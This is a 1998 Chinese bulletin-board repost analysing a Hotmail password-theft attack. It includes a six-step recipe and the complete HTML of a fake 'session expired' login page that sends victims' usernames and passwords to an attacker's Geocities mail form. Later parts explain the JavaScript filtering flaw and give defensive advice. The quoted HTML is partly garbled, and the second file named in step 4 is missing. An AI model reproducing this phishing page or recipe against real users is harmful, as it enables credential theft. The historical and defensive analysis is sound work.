发信人: netcc (小川), 信区: Hacker
标 题: [转载] Hotmail 密码窃取技术分析
发信站: BBS 水木清华站 (Fri Oct 9 09:59:42 1998) WWW-POST
基于 WEB 的免费电子邮件并非安全,存在潜在的安全问题。本文回顾了
最近发生的 Hotmail 用户密码失窃安全漏洞,对攻击代码原理进行了分析,
希望对正确认识免费电子邮件安全性有所帮助。
1998 年 8 月 24 日,微软的 Hotmail Service 中的系列安全问题被发
现,本站 27 日迅速对此新闻做了报道。恶意的用户利用这一安全漏洞可以很
容易的窃取 Hotmail 用户的口令。窃取时发送包含 javascript 代码的信息
,当 Hotmail 用户看到信息时,内嵌的 javascript 代码要求用户重新登录
进 Hotmail。在这样做的时候,用户名、口令和 IP 地址都被通过 e-mail 发
送到恶意用户手中。
8 月 25 日,Hotmail 发布了针对 24 日安全漏洞的补丁;黑客迅即发布
了针对 25 日的新的攻击代码 "HOT"MAIL,攻破过滤器的防范,用户密码被窃
的可能依然如旧;27 日,Hotmail 再次更新了补丁,成功封杀新的黑客攻击;
新闻报道时,Hotmail 对这次全面的过滤器设计信心十足,誓将黑客拦于门外,
不料天衣无缝的补丁还是敌不过黑客的旁门左道,8 月 31 日,同一黑客发布
了最新的“ATTACKMENTS”攻击,这次,Hotmail 无奈地表示:did not know
when the problem would be fixed。
基于 WEB 的免费电子邮件屡遭攻击不是偶然的,正是它迫使使用浏览器
来查看邮件这个先天性的缺陷,使得黑客通过 Javascript、Java、CGI 等技术
攻击成为可能。目前主要的防范措施是设置过滤器,拦截并消除可能的攻击代
码形式。但是黑客可以不断更换攻击形式,一旦出现过滤器设计时未曾考虑到
的代码形式,过滤器的拦截就形同虚设。黑客对 25 日 Hotmail 的补丁的新
攻击,就是因为新的代码形式欺骗了 Hotmail 的过滤器。
我们先看看黑客发布的第二次攻击代码 "HOT"MAIL,并对其做出分析。
窃取代码和准备工作
在干活之前,你只需准备好:
一台能访问 Internet 的计算机
Netscape Mail 电子邮件软件(或类似的e-mail 程序)
记事本(或类似文本编辑器)
web 页面空间
步骤 1:访问 hotmail.com 并登记一免费 e-mail 帐号。在登记过程中
不必输入联系信息。
步骤 2:访问 Geocities.com 并登记免费主页。选择用户名为 ybwc。除
了 e-mail 地址我们不需要输入其他联系信息,我们使用的 e-mail 地址来自
步骤一。登记后,我们从 Geocities 得到一新免费 email 帐号。
(ybwc@geocities.com)。
步骤 3:打开“记事本”输入以下文本,存为 getmsg.htm。接着将文件
上载到我们的 web 空间。Line 14 包含从步骤二得到的 Geocities 用户名。
<html><head></head>
<body bgcolor="#ffffff" link="#000099"vlink="#000099">
<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>
<tr valign=middle><th colspan=2>
<font face="Arial, Helvetica" size="5">We're Sorry, WeCannot<br>
Process Your Request</font>
</th></tr>
<tr valign=middle><td align=center>
<font face="Arial, Helvetica"size="3">Reason: </font>
<font face="Arial, Helvetica" size="3"color="#ff0000"><b>Time
expired.
Pleasere-login.</b></font><br>
<font face="Arial, Helvetica" size="2"><ahref="http://www.hotmail.com/errormsg
.html">(Get more info regarding errormessages here)</a></font>
</td></tr>
<tr valign="middle"><td align="center">
<FORM METHOD=POSTACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?yb
wc"target="_top">
<INPUT TYPE="hidden" NAME="next-url"VALUE=" ">http://www.hotmail.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="HotmailPassword">
<table cellpadding="0" cellspacing="5" border="0">
<tr><td><font face="Arial, Helvetica" size="2">LoginName:</font><br><input
type="text" name="login"size="16" maxlength="16"></td><td><fontface="Arial,
Helvetica"size="2">Password:</font><br><input type="password"name="passwd"
size="16"maxlength="16"> <input type="submit"value="Enter"></td><tr>
</table></form></td></tr>
<tr valign=middle><th colspan=2 align=center>
<font face="Arial, Helvetica" size="3">Return to <ahref="http://welcome.to/www
.hotmail.com" target="_parent">Hotmail'sHomepage</a>.
</font></th></tr></table>
<p><img src="http://209.1.112.251/c9698.gif" width=189 height=16border=0
alt="Copyright 1996-1997">
</body></html>
步骤 4:打开“记事本”输入以下文本,存为 message.htm。第 4 行中
包括步骤三中得来得 URL getmsg.htm。
步骤 5:整理出新的 e-mail 信息,名为 victim@hotmail.com*。将
message.htm 文件插入该 e-mail 信息中,并向对方发出信息。
步骤 6:等待对方检查其 Hotmail 帐号。在对方看到我们的信息后,
检查 Geocities email。收到来自 Geocities 的 e-mail 信息,列有
Hotmail 用户 victim@hotmail.com 的 ip 地址、用户名和口令密码。
"HOT"MAIL 如何窃取信息
为什么 “Hot”Mail 能窃取信息?微软的 Hotmail 服务本身含有安全问
题。Hotmail 对 email 信息所做的过滤 Javascript 代码的努力不够完善,
恶意的用户能将 javascript 程序嵌入 e-mail 信息中。Javascript 程序在
个人 web 页面中一般不会造成安全问题,不过当 javascript 编码嵌入
Hotmail 信息中时,就能改变 Hotmail 用户界面的性质。
在我们描述的信息窃取过程中,javascript 改变了 Hotmail 界面上每
一条链接的性质。当用户单击链接时,就会显示(伪造的) Hotmail 信息。
通知用户的 Hotmail 使用时间已到期,要继续使用必须重新登录。通知页面
中有要求用户输入用户名、密码以重新登录的部分。但用户输入的信息都会
发送到窃贼处。
在我们描述的窃取过程中,“窃取”作用的程序部分是由 Geocities 向
其所有成员免费提供的。这不能视为 Geocities 的疏忽或问题,因为同样可
用的服务器端邮递程序有上千种。
“Hot”Mail 漏洞只是多种具有潜在危害的 javascript 内嵌程序的一种,
由于只要信息被看到时 javascript 编码就能运行,并且改变用户界面的各个
部分,我们迫切希望 Hotmail 能实施更严密的 javascript 过滤器。
最新的“ATTACKMENTS”攻击则是利用了 Macromedia 公司的 Shockwave
插件来实现,有兴趣的读者可以到“ATTACKMENTS”的网址去看个究竟。
如何避免 “HOT”MAIL 问题
在 Hotmail 修补好安全问题之前,我们建议 Hotmail 用户在浏览器中取
消 javascript。甚至用户对此类问题较为熟悉的用户也会受到其他内嵌
javascript 程序的危害。
Netscape 用户可在参数选择 (edit / preferences / advanced
/ disable
javascript) 取消 javascript。
IE 用户可在参数选择 (view / internet options / security
/ custom
settings / scripting / disable active scripting) 取消 javascript。
最新的"ATTACKMENTS"攻击,用户单击 Hotmail 中的邮件附件时可能会被
盗走密码,因此在用 Hotmail 的时候,不要打开 Hotmail 附件(特别是
htm 或 html 文件)。
同样的建议,适用于所有基于 Web 浏览器的免费电子邮件。有兴趣的
读者可以测试国内基于 Web 的免费电子邮件系统。警告:不要做偷窃别人
密码的违法事情,否则后果自负。
--
**** Clinux Mailing List Server --用email参加BBS和News的讨论
****
欲知详情,请见
http://list.clinux.ml.org/
--
我就是我,Cool
※ 修改:·netcc 於 Oct 9 09:59:42 修改本文·[FROM: 202.206.243.119]
※ 来源:·BBS 水木清华站 bbs.net.tsinghua.edu.cn·[FROM: 202.206.243.119]
本文转自中文Linux论坛